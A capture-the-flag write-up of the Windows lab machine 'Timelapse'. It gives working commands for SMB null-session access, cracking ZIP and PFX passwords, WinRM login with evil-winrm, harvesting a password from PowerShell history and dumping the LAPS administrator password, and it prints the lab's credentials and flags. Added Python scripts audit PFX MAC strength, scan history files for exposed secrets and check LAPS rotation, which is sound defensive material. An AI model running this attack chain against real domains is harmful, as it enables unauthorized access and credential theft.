Timelapse
8 minute read
- OS: Windows
- Difficulty: Easy
- IP address: 10.10.11.152
- Date: 26 / 03 / 2022
Port scan
# Nmap 7.92 scan initiated as: nmap -sC -sV -o nmap/targeted 10.10.11.152 -p 53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,49692,53215
Nmap scan report for 10.10.11.152
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-28 00:13:43Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
|_ssl-date: 2022-03-28T00:15:13+00:00; +8h18m23s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| tls-alpn:
|_ http/1.1
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49692/tcp open msrpc Microsoft Windows RPC
53215/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-03-28T00:14:36
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 8h18m22s, deviation: 0s, median: 8h18m22s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done -- 1 IP address (1 host up) scanned in 100.14 seconds
The machine has ports 53 (DNS), 88 (Kerberos), 135 (MS-RPC), 389 (LDAP), 445 (SMB) and 5986 (WinRM over SSL) open, among others.
$ crackmapexec smb 10.10.11.152
SMB 10.10.11.152 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
We also see that the machine is a domain controller (DC) of an Active Directory (AD) environment. We can start by adding timelapse.htb to /etc/hosts.
SMB enumeration
We can start by looking at SMB with a null session:
$ smbclient -L 10.10.11.152 -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
We see that there is a share called Shares. We can connect to it and list some folders:
$ smbclient //10.10.11.152/Shares -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Oct 25 10:39:15 2021
.. D 0 Mon Oct 25 10:39:15 2021
Dev D 0 Mon Oct 25 14:40:06 2021
HelpDesk D 0 Mon Oct 25 10:48:42 2021
6367231 blocks of size 4096. 2285718 blocks available
smb: \> cd Dev
smb: \Dev\> dir
. D 0 Mon Oct 25 14:40:06 2021
.. D 0 Mon Oct 25 14:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 10:46:42 2021
6367231 blocks of size 4096. 2285702 blocks available
smb: \Dev\> get winrm_backup.zip
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (8.4 KiloBytes/sec) (average 8.4 KiloBytes/sec)
smb: \Dev\> cd ..\HelpDesk\
smb: \HelpDesk\> dir
. D 0 Mon Oct 25 10:48:42 2021
.. D 0 Mon Oct 25 10:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 09:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 09:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 09:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 09:57:44 2021
6367231 blocks of size 4096. 2285718 blocks available
smb: \HelpDesk\> mget *
Get file LAPS.x64.msi? y
getting file \HelpDesk\LAPS.x64.msi of size 1118208 as LAPS.x64.msi (545.5 KiloBytes/sec) (average 475.1 KiloBytes/sec)
Get file LAPS_Datasheet.docx? y
getting file \HelpDesk\LAPS_Datasheet.docx of size 104422 as LAPS_Datasheet.docx (265.6 KiloBytes/sec) (average 445.1 KiloBytes/sec)
Get file LAPS_OperationsGuide.docx? y
getting file \HelpDesk\LAPS_OperationsGuide.docx of size 641378 as LAPS_OperationsGuide.docx (654.5 KiloBytes/sec) (average 500.1 KiloBytes/sec)
Get file LAPS_TechnicalSpecification.docx? y
getting file \HelpDesk\LAPS_TechnicalSpecification.docx of size 72683 as LAPS_TechnicalSpecification.docx (176.6 KiloBytes/sec) (average 468.0 KiloBytes/sec)
smb: \HelpDesk\> exit
We have downloaded all of these files:
winrm_backup.zip
LAPS.x64.msi
LAPS_Datasheet.docx
LAPS_OperationsGuide.docx
LAPS_TechnicalSpecification.docx
Cracking the files
The ZIP file is password protected:
$ unzip -l winrm_backup.zip
Archive: winrm_backup.zip
Length Date Time Name
--------- ---------- ----- ----
2555 2021-10-25 09:21 legacyy_dev_auth.pfx
--------- -------
2555 1 file
$ unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
We can use fcrackzip to find the password with a brute-force attack:
$ fcrackzip -uDp $WORDLISTS/rockyou.txt winrm_backup.zip
PASSWORD FOUND!!!!: pw == supremelegacy
$ unzip -P supremelegacy winrm_backup.zip
Archive: winrm_backup.zip
inflating: legacyy_dev_auth.pfx
The ZIP file contains a PFX file, which holds a key pair for connecting over WinRM on port 5986 rather than the usual 5985. This is because SSL is in use, and so we need the public and private keys to connect.
We can extract these keys with openssl:
$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -nodes -out priv-key.pem
Enter Import Password:
Can't read Password
But we need another password, because supremelegacy does not work.
I found a tool called crackpkcs12 to perform a brute-force attack:
$ ./crackpkcs12 -d $WORDLISTS/rockyou.txt legacyy_dev_auth.pfx
Dictionary attack - Starting 1 threads
*********************************************************
Dictionary attack - Thread 1 - Password found: thuglegacy
*********************************************************
And we get another password, so let's grab the keys:
$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -nodes -out priv-key.pem
Enter Import Password:
MAC verified OK
$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out pub-key.pem
Enter Import Password:
MAC verified OK
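Those "MAC verified OK" lines are the PKCS#12 integrity check: the trailing MacData structure of a PFX holds a digest algorithm, a salt and an iteration count, and the import password is what derives the MAC key, so the MAC is exactly what password-checking tools verify for every candidate. The iteration count is therefore the cost of each guess and the figure an auditor should look at (it is the same value openssl pkcs12 -info reports). The following stdlib-only Python is an added example, not code from this write-up or from any of the tools it uses: it builds a constructed, key-free PFX skeleton and walks the DER to read those MAC parameters; the 100,000-iteration threshold in assess() is an assumed policy value.

```python
"""Read the MacData parameters of a PKCS#12 (PFX) file without third-party libraries.

Added example. The sample PFX is constructed inline and carries no real keys;
only the outer structure (version, authSafe, MacData) matters here.
"""

DIGEST_OIDS = {"1.3.14.3.2.26": "sha1", "2.16.840.1.101.3.4.2.1": "sha256"}
PKCS7_DATA = "1.2.840.113549.1.7.1"


# --- minimal DER encoding, used only to build the constructed sample --------
def _der_len(n):
    if n < 0x80:
        return bytes([n])
    b = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(b)]) + b


def _tlv(tag, body):
    return bytes([tag]) + _der_len(len(body)) + body


def _der_int(v):
    # the extra byte keeps the sign bit clear for positive values
    return _tlv(0x02, v.to_bytes((v.bit_length() + 8) // 8, "big"))


def _der_oid(dotted):
    arcs = [int(a) for a in dotted.split(".")]
    out = [40 * arcs[0] + arcs[1]]
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return _tlv(0x06, bytes(out))


def build_sample_pfx(iterations=2048, digest_oid="1.3.14.3.2.26", with_mac=True):
    """Constructed PFX: empty authSafe payload, dummy digest and 8-byte salt."""
    auth_safe = _tlv(0x30, _der_oid(PKCS7_DATA) + _tlv(0xA0, _tlv(0x04, b"\x30\x00")))
    body = _der_int(3) + auth_safe
    if with_mac:
        alg_id = _tlv(0x30, _der_oid(digest_oid) + b"\x05\x00")
        digest_info = _tlv(0x30, alg_id + _tlv(0x04, b"\x00" * 20))
        mac_data = digest_info + _tlv(0x04, b"\x01" * 8)
        if iterations != 1:  # DER omits the DEFAULT value 1
            mac_data += _der_int(iterations)
        body += _tlv(0x30, mac_data)
    return _tlv(0x30, body)


# --- minimal DER reading ----------------------------------------------------
def _read_tlv(buf, pos):
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:  # long form: next n bytes hold the length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def _oid_to_str(raw):
    arcs, value = [raw[0] // 40, raw[0] % 40], 0
    for byte in raw[1:]:
        value = (value << 7) | (byte & 0x7F)
        if not byte & 0x80:
            arcs.append(value)
            value = 0
    return ".".join(map(str, arcs))


def pfx_mac_params(pfx):
    """Return {'digest', 'salt_len', 'iterations'}, or None when the PFX has no MacData."""
    tag, body, _ = _read_tlv(pfx, 0)
    if tag != 0x30:
        raise ValueError("not a DER SEQUENCE; is the file PEM rather than PKCS#12?")
    _, version, pos = _read_tlv(body, 0)
    if int.from_bytes(version, "big") != 3:
        raise ValueError("unexpected PFX version")
    _, _auth_safe, pos = _read_tlv(body, pos)
    if pos >= len(body):
        return None  # no integrity MAC at all
    _, mac_data, _ = _read_tlv(body, pos)
    _, digest_info, p = _read_tlv(mac_data, 0)
    _, salt, p = _read_tlv(mac_data, p)
    iterations = 1
    if p < len(mac_data):
        _, it_raw, _ = _read_tlv(mac_data, p)
        iterations = int.from_bytes(it_raw, "big")
    _, alg_id, _ = _read_tlv(digest_info, 0)
    _, oid_raw, _ = _read_tlv(alg_id, 0)
    oid = _oid_to_str(oid_raw)
    return {"digest": DIGEST_OIDS.get(oid, oid), "salt_len": len(salt), "iterations": iterations}


def assess(params, min_iterations=100_000):
    """Audit verdict: does the MAC meaningfully slow down offline password guessing?"""
    if params is None:
        return "no MAC: the file carries no integrity check at all"
    if params["iterations"] < min_iterations:
        return f"weak: {params['digest']} with {params['iterations']} iterations (below {min_iterations})"
    return f"ok: {params['digest']} with {params['iterations']} iterations"


if __name__ == "__main__":
    for it in (1, 2048, 600_000):
        params = pfx_mac_params(build_sample_pfx(iterations=it))
        print(params, "->", assess(params))
    print(assess(pfx_mac_params(build_sample_pfx(with_mac=False))))
```

Run it against a real file with pfx_mac_params(open(path, "rb").read()). A PFX exported with OpenSSL's defaults carries 2048 MAC iterations, which is why offline guessing against such files is fast; exporting with a far higher iteration count helps, but the real fix on this box would have been not leaving a backup of a WinRM client certificate on a share readable by null sessions.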
And now we can use evil-winrm to connect to the machine (there is no need to supply a username or password, because the identity is carried by the certificate and key):
$ evil-winrm -i 10.10.11.152 --ssl -k priv-key.pem -c pub-key.pem
Evil-WinRM shell v3.3
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents> type ..\Desktop\user.txt
76a99a6d71f58a99a2844eb3b48334e3
And there we have the user.txt flag.
System enumeration
Let's enumerate users:
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd ..\..
*Evil-WinRM* PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/23/2021 11:27 AM Administrator
d----- 10/25/2021 8:22 AM legacyy
d-r--- 10/23/2021 11:27 AM Public
d----- 10/25/2021 12:23 PM svc_deploy
d----- 2/23/2022 5:45 PM TRX
*Evil-WinRM* PS C:\Users> net user legacyy
User name legacyy
Full Name Legacyy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/23/2021 12:17:10 PM
Password expires Never
Password changeable 10/24/2021 12:17:10 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 3/28/2022 5:10:20 PM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users *Development
The command completed successfully.
*Evil-WinRM* PS C:\Users> net user svc_deploy
User name svc_deploy
Full Name svc_deploy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/25/2021 12:12:37 PM
Password expires Never
Password changeable 10/26/2021 12:12:37 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 3/28/2022 1:16:01 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *LAPS_Readers *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users> net user TRX
User name TRX
Full Name TRX
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/23/2022 6:43:45 PM
Password expires Never
Password changeable 2/24/2022 6:43:45 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 3/27/2022 10:29:10 PM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users *Domain Admins
The command completed successfully.
We see that svc_deploy belongs to LAPS_Readers and that TRX belongs to Domain Admins.
LAPS stands for Local Administrator Password Solution; it generates a secure password for the local administrator account (the Word documents provide this information). If we manage to get access as svc_deploy, we will be able to read the LAPS password.
After some enumeration, we discover that legacyy has a PowerShell history containing interesting commands:
*Evil-WinRM* PS C:\Users\legacyy\Documents> dir C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline
Directory: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/3/2022 11:46 PM 434 ConsoleHost_history.txt
*Evil-WinRM* PS C:\Users\legacyy\Documents> type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
There we have svc_deploy's password. Now we can run commands as svc_deploy through script blocks:
*Evil-WinRM* PS C:\Users\legacyy\Documents> $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
*Evil-WinRM* PS C:\Users\legacyy\Documents> $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\legacyy\Documents> $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
*Evil-WinRM* PS C:\Users\legacyy\Documents> Invoke-Command -ComputerName localhost -Credential $c -Port 5986 -usessl -SessionOption $so -ScriptBlock { whoami }
timelapse\svc_deploy
And we can even connect with evil-winrm:
$ evil-winrm -i 10.10.11.152 --ssl -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV'
Evil-WinRM shell v3.3
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>
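The finding above is the classic PSReadLine leak: every interactive PowerShell command is appended to ConsoleHost_history.txt under the user's AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine folder, so a ConvertTo-SecureString ... -AsPlainText typed once stays readable to anyone who can read the profile. As an added example that is not part of the original write-up, here is a small scanner a responder can run over history files collected from user profiles; the history it ships with is constructed, the secrets in it are placeholders, and the rule names are my own.

```python
"""Scan PowerShell console history for exposed credentials and weakened TLS checks.

Added example for defenders triaging PSReadLine ConsoleHost_history.txt files.
The sample history below is constructed; every secret in it is a placeholder.
"""
import re

# Each rule: (name, trigger pattern, redaction pattern or None, redaction replacement)
RULES = [
    (
        "plaintext_securestring",                       # secret typed in the clear
        re.compile(r"ConvertTo-SecureString\s+(['\"]).+?\1.*-AsPlainText", re.I),
        re.compile(r"(ConvertTo-SecureString\s+)(['\"]).+?\2", re.I),
        r"\1\2***\2",
    ),
    (
        "credential_object",                            # a PSCredential was built by hand
        re.compile(r"PSCredential\s*\(", re.I),
        None,
        None,
    ),
    (
        "tls_checks_disabled",                          # certificate validation switched off
        re.compile(r"-Skip(?:CACheck|CNCheck|RevocationCheck)\b", re.I),
        None,
        None,
    ),
    (
        "net_use_inline_password",                      # net use /user:... <password>
        re.compile(r"/user:\S+\s+(?!\*)\S+", re.I),
        re.compile(r"(/user:\S+\s+)\S+", re.I),
        r"\1***",
    ),
]


def scan_history(text):
    """Return one finding per (line, rule) as dicts: line number, rule name, redacted line."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for name, trigger, redact_re, redact_to in RULES:
            if not trigger.search(line):
                continue
            shown = redact_re.sub(redact_to, line) if redact_re else line
            findings.append({"line": line_no, "rule": name, "redacted": shown})
    return findings


def rotate_list(findings):
    """Rules whose hits mean a credential was exposed and must be rotated."""
    exposing = {"plaintext_securestring", "net_use_inline_password"}
    return sorted({f["line"] for f in findings if f["rule"] in exposing})


# Constructed sample history (placeholder account and secrets).
SAMPLE_HISTORY = r"""whoami
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'Sample-Secret-1' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_sample', $p)
Invoke-Command -ComputerName localhost -Credential $c -Port 5986 -UseSSL -SessionOption $so -ScriptBlock {whoami}
Get-ADUser -Filter * -Properties *
net use Z: \\fileserver\share /user:CORP\svc_sample Sample-Secret-2
exit
"""

if __name__ == "__main__":
    hits = scan_history(SAMPLE_HISTORY)
    for h in hits:
        print(f"line {h['line']:3} {h['rule']:26} {h['redacted']}")
    print("lines with credentials to rotate:", rotate_list(hits))
```

Point scan_history() at the text of each ConsoleHost_history.txt found under the user profiles and treat every plaintext_securestring or net_use_inline_password hit as a credential to rotate. For accounts that must type credentials interactively, Set-PSReadLineOption -HistorySaveStyle SaveNothing stops the file from being written in the first place, and the -SkipCACheck/-SkipCNCheck hits are worth a separate look, since they show the WinRM certificate on 5986 was not trusted by the client that used it.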
Privilege escalation
But most importantly, we can read the password set by LAPS using crackmapexec:
$ crackmapexec ldap 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -M laps
LDAP 10.10.11.152 389 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.152 389 DC01 [+] timelapse.htb\svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV
LAPS 10.10.11.152 389 DC01 [*] Getting LAPS Passwords
LAPS 10.10.11.152 389 DC01 Computer: DC01$ Password: h!0yj-1WI(YlDIz+2Il@w1/(
And now we have access as Administrator:
$ evil-winrm -i 10.10.11.152 --ssl -u Administrator -p 'h!0yj-1WI(YlDIz+2Il@w1/('
Evil-WinRM shell v3.3
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
Cannot find path 'C:\Users\Administrator\Desktop\root.txt' because it does not exist.
At line:1 char:1
+ type ..\Desktop\root.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\Administrator\Desktop\root.txt:String) [Get-Content], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
But where is the root.txt flag? We will have to search for it:
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ChildItem root.txt -Path C:\Users\ -Recurse
Directory: C:\Users\TRX\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/28/2022 6:16 PM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\TRX\Desktop\root.txt
1505bebfda29707adf43cf8530421b35
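What crackmapexec's laps module returned is the cleartext value of ms-Mcs-AdmPwd, which legacy LAPS (the version documented in the .docx files found on the share) stores on the computer object next to ms-Mcs-AdmPwdExpirationTime, a Windows FILETIME. That expiration attribute is what a defender audits after an incident like this one: an expired value means rotation has stalled and the password just read stays valid, and writing the current time to it makes the client rotate at its next Group Policy refresh. The Python below is an added example, not from the write-up or from any LAPS tooling; the computer records are constructed and the 30-day maximum age is an assumed policy value.

```python
"""Audit legacy LAPS rotation state from the expiration timestamps on computer objects.

Added example. Records are constructed; in a real run they would come from an
LDAP query for ms-Mcs-AdmPwdExpirationTime on each computer object.
"""
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
EXPIRATION_ATTR = "ms-Mcs-AdmPwdExpirationTime"


def from_filetime(ft):
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) -> aware datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=int(ft) // 10)


def to_filetime(dt):
    """Aware datetime -> FILETIME integer, the form the attribute is stored in."""
    return (dt - FILETIME_EPOCH) // timedelta(microseconds=1) * 10


def audit(records, now, max_age_days=30):
    """Map computer name -> ok | expired | too-long | not-managed."""
    verdicts = {}
    for rec in records:
        raw = rec.get(EXPIRATION_ATTR)
        if raw is None:
            verdicts[rec["name"]] = "not-managed"  # LAPS never wrote to this object
            continue
        expires = from_filetime(raw)
        if expires < now:
            verdicts[rec["name"]] = "expired"      # rotation stalled; password still valid
        elif expires - now > timedelta(days=max_age_days):
            verdicts[rec["name"]] = "too-long"     # expiry pushed beyond the policy window
        else:
            verdicts[rec["name"]] = "ok"
    return verdicts


def force_rotation_value(now):
    """Value to write to ms-Mcs-AdmPwdExpirationTime so the client rotates at next refresh."""
    return to_filetime(now)


# Constructed sample: three managed computers and one without the attribute.
SAMPLE_RECORDS = [
    {"name": "DC01$", EXPIRATION_ATTR: "132928992000000000"},  # 2022-03-28 00:00 UTC
    {"name": "WS01$", EXPIRATION_ATTR: "132900000000000000"},  # 2022-02-22 10:40 UTC
    {"name": "WS02$", EXPIRATION_ATTR: str(to_filetime(datetime(2022, 9, 1, tzinfo=timezone.utc)))},
    {"name": "WS03$"},
]
NOW = datetime(2022, 3, 27, 12, 0, tzinfo=timezone.utc)

if __name__ == "__main__":
    for name, verdict in audit(SAMPLE_RECORDS, NOW).items():
        print(f"{name:6} {verdict}")
    print("expiration value that forces rotation now:", force_rotation_value(NOW))
```

The "expired" bucket is the one to act on first: those hosts still run the password an attacker with LAPS_Readers membership could have read, and they will not rotate on their own until the client next sees a past expiration. Membership in the reader group itself (svc_deploy here) deserves the same review, since legacy LAPS relies purely on the ACL of ms-Mcs-AdmPwd to keep the cleartext value private.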